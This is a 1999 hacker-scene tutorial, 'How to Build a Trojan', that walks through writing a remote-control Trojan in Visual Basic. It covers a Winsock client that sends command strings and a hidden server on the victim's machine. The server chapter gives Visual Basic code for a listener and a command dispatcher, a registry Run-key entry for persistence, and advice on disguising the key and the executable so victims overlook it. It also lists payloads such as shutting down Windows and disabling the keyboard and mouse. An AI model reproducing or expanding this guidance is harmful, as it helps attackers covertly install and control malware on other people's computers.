HOW TO BUILD A TROJAN by Wax
Chapter I : Getting Started
Chapter II : The Client
Chapter III : The Server
Chapter IV : Colofon + Resources
===================================================
CHAPTER I - GETTING STARTED
First of all you need a pretty good basic knowledge of
the language you are going to write the Trojan in, since
I wrote my (1st) Trojan in VB this article will mostly
describe the way on how to do it in VB, but since this
does not provide source code, it can be used in Delphi
as well (with some minor modifications)
I also advice reading a book or some good quality articles
on using the Windows API (David Appleman's API book e.g.)
Every Trojan concists of 2 parts;
The Server: This is the program that the victim runs,
and the Client executes certain commands that the
server sends to the program through an active connection
The Client: This is the program that the 'administrator'
has, it sends command strings to the server, so that it
knows what to execute, e.g.: Should you press a button
that would execute a function to open a CD-ROM, then
the server would use the connection between the client
and the server to send a string, e.g.: OPENCDROM and
then the server would recognize the string, and issue
the command u have defined or the one that is attached
to the string (in this case: execute the API code to
open the CD-ROM drive)
OK, the best thing to do is start with the CLIENT
first of all you have to make up a plan on which
functions you want to have in the Trojan, and how
u plan on using them, e.g. in Visual Basic there is
a ActiveX (OCX) control that can play sound file or
video files, but you can also use the Windows API to
play a sound, the advantage of this is that you do not
need to include that OCX seperatly, and it takes less
code, should you want to use API, it would be somehting
alike this:
--
dim x
x = mciexecute("play c:\sound.wax")
--
But offcourse, u have to define the DLL u use (winmm.dll)
with the Declare function in VB (read a book on API's)
OK, in this article I will start with the CLIENT as well
should u want to start with the SERVER first, head on to
chapter III (The Server).
===================================================
CHAPTER II - THE CLIENT
===================================================
Assuming you know your language well enough to be able
to implent data structures and such I will describe WHY
and HOW to use them.
First you start of with your blank form, depending on how
many functions you want you can create a number of buttons
or a menu (or whatever you think suits best)
Here's a sample GUI on how it could look like, I've used
menu's (in the drawing they are unfolded)
_________________________________________________________
|PROGRAM NAME______________________________________- [] x |
|FILE_________ COMMANDS_____ HELP______________________|
|Setup | |Shutdown | |About | |
|Connect | |Reboot | |Help | |
|Discconnect | |Open Cd-Rom | |------| |
|Exit | |Close Cd-Rom | |
|------------| |-------------| |
| |
| |
| |
| |
| |
|_________________________________________________________|
Throughout this Chapter I will refer to menu functions, u can
see it when I use the word in full capitals, and between
apostrophes ( '..' )
At 'FILE' -> 'SETUP' you can make a setup dialog, at which
users define the IP of the computer to connect to, as well
as the PORT the server is opened to receive commands. ~ ~
~ ___ ~
At 'FILE' -> 'CONNECT' the command to connect to the server ~ \_\\\\\/ o\ ~
is issued, make sure to keep the user informed of the connection ~ / /////\___/ ~
as well as connected process, by e.g. placing a label which ~ ~ ~
updates every 3 seconds with the current Winsock status, so that ~ aTm ~
they know wether they are connected or not.
At 'FILE' -> 'DISCONNECT' the command to disconnect from the
server is issued, at this one too make sure it is clearly
noticable that you are disconnected from the server.
And offcourse at 'FILE' -> 'EXIT' you can exit the program
At 'COMMANDS' -> '...' You can add the commando to be executed
but more of that at the technical part of the client.
At 'HELP' -> 'ABOUT' you can put your own credits, and offcourse
some credits for me, since u have used this guide to create
your Trojan :)
OK, now you know the basics on the GUI, offcourse you can always
use graphics, or any other type of gui, but make sure it is
a GUI, or optional GUI, since most users nowadays are Windows
users. (There's a complicated GUI Drawing at the end of the file)
Now for the 'Technical' Part of the Client;
Sending the commands to the server.
--
This will be done using Winsock's senddata command.
Say you'd want to send the following string to the server:
CD-ROMOPEN, then in VB you'll need to type
winsock1.senddata "CD-ROMOPEN"
To make sure there is an connection u can use an IF..THEN
statement to check the winsock's satus, like this:
--
If winsock1.state = sckConnected Then
winsock1.senddata "CD-ROMOPEN" else
msgbox ("You're not connected!"),vbCritical
end if
--
Ok, this is the client, it is not that hard, and by using the
above system to send strings you can let the Trojan's Server
recognize them and issue the attached code on the victim's
computer.
===================================================
CHAPTER III - THE SERVER
===================================================
Now for the server, the server is the hardest part of the Trojan
since there a lot of things it has to match to, I will try to
make a complete list of what it should, or should not do:
* Not Visible on the users screen
* Not Visible on the TaskList (CTRL-ALT-DEL list)
* Have a name that is not easily recovered
* Auto-Starting up at startup (thru registry e.g.)
* Not use much system power (RAM)
Below is the code for a registry file which will add it's key
and value to the registry so that the server will be started
everytime windows starts (exe has to be in windows or system
)
--
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trojan"="Trojan.exe"
--
Offcourse in your own file you might want to change the name of the key
from "Trojan" to e.g. Taskman or Word or something the user won't
be suspicious about, the executable in the windows or system
needs to have an insuspicious name too, u could make it _.exe
or something, with a 100% transparant icon so users look over it.
?
Now there's nothing much of a GUI for the server so I'll skip that ? ____
part. / \ ?
Technical: / \ _ \
( .o o. ) ___
A winsocket control on the server needs to have a certain port __/ ^ \/ \
specified and it must also be listening on it & accepting all / \___o____
incoming connections on that word, in VB that would be:
--
winsock1.localport = "333"
winsock1.listen
--
Now comes the Core Engine of the Trojan, receiving and handling the
incoming data from the client:
On Winsock's Data Arrival you have to use the statement
winsock1.getdata data, but offcourse first you must dim the data
as a string, then you use a 'case select' on which on matches the
incoming data, if they match it executes the attached command,
below is a sniplet of code handling:
--
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim data As String
Winsock1.GetData data
Select Case data
Case "ABOUT"
Call About1
End Select
End Sub
--
as you can see it dim's the data as a string, since the client
sends it's command through strings, then it gets the data
and matches it with the Case Data, in this case if you sent
the string ABOUT it will call the private sub About1, which you
can see below:
--
Private Sub About1()
msgbox ("U ARE INFECTED BY [YOURNAME'S] TROJAN!"),vbcritical
End Sub
--
The best thing would be to make a module in the project, go online
and collect all usefull API codes you can find, I've listed a few
things you might want to implent:
- CDROM OPEN/CLOSE
- SHUTDOWN WINDOWS
- DISABLE KEYBOARD/MOUSE
After you've read this article I'm sure you can be able to write
your own trojan, since the core is described in here, and the source
code provided within is the key to making trojans I wish you
happy programming, and as the people on #coders always answer;
IT'S JUST A SMOP (Simple Matter Of Programming)
===================================================
CHAPTER IV - COLOFON + RESOURCES
===================================================
Writing of this guide is Copyright 1999 by Wax
Eyewitness Archives 1999
Waxattacks own Trojan, which is written with
Kilobyte from Synetic Industries can be found
at: http://www.acornweb.com/synetic/
All code & writing in this guide are Copyright Wax
ASCII Drawings however are Copyright 1999 by
aTm from CLASS, freely taken from JTF 98 issues
Resources:
--
http://www.respect-inc.com/eyewitness EYEWITNESS ARCHIVES
http://www.vb-world.net API CODES
http://www.planet-source-code.com API CODES